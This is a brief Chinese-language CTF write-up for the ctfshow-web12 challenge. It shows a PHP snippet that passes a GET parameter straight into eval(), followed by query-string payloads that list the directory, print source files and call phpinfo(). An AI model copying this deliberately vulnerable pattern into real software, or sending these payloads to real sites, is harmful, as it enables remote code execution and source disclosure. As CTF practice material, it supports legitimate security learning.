LOADING

php_eval()函数读取信息

网络安全

eval()

ctfshow-web12

<?php
        $cmd=$_GET['cmd'];
        eval($cmd);
    
            ?>

读取./目录文件

?cmd=print_r(scandir('./'));

读取example.php文件

?cmd=show_source('example.php');

读取example.php文件

?cmd=highlight_file('example.php');
?cmd=phpinfo();